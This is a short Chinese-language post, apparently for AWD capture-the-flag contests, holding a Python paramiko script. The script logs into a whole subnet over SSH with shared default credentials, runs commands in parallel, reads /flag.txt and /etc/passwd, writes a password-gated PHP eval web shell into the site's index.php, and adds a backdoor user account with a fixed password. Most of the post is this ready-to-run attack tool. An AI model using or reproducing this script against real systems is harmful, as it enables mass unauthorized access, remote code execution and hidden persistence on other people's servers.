前兩年有些AWD比賽，環境沒有做隔離，伺服器初始化密碼都一樣，可通過批量連線每臺伺服器來修改密碼，執行命令。

或者是已經拿到多臺伺服器許可權後，做一個批量管理。

平時企業運維中，可能也用得到。

#-*- coding: utf-8 -*-

#!/usr/bin/python 

import paramiko

import threading



def ssh2(ip,username,passwd,cmd):

    try:

        ssh = paramiko.SSHClient()

        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        ssh.connect(ip,22,username,passwd,timeout=5)
        #ssh.connect(ip,22,username,passwd,timeout=50)

        for m in cmd:

            stdin, stdout, stderr = ssh.exec_command(m)

#           stdin.write("Y")   #簡單互動，輸入 ‘Y’ 

            out = stdout.readlines()

            #螢幕輸出

            for o in out:

                #print o,
                print o+"("+ip+")"+"\n"

        print '%s\tOK\n'%(ip)

        ssh.close()
        

    except :

        print '%s\tError\n'%(ip)





if __name__=='__main__':

    cmd1="cat /etc/passwd"
    
    cmd2="echo \'<?php if(md5($_GET[\'guo\'])===\"f11487ed3a8dedaddaf0999baf85bd17\"){@eval($_POST['cmd']);} ?>\' >/var/www/html/temp123123.php "
    cmd2="echo \'<script language=\"PHP\"> if(md5($_GET[\'guo\'])===\"f11487ed3a8dedaddaf0999baf85bd17\"){@eval($_POST[\'cmd\']);} </script>\' >> /var/www/html/index.php"

    cmd3="adduser qwer" #增加賬戶qwer

    cmd4="echo \"123123123\"|passwd --stdin qwer"  #設定該賬戶的密碼為123123123

    #你要執行的命令列表
    cmd = ["cat /flag.txt",cmd2,'cat /var/www/html/temp123123.php',cmd3,cmd4]


    
    username = "admin"  #使用者名稱
    passwd = "123456"    #密碼

    
    threads = [100]   #多執行緒

    print "Begin......"

    for i in range(1,256):
          #  ip="192.168.32.167"

        #ip = '192.168.50.'+str(i)
          
        ip = "172.20."+str(i)+".101"
        a=threading.Thread(target=ssh2,args=(ip,username,passwd,cmd))
        a.start()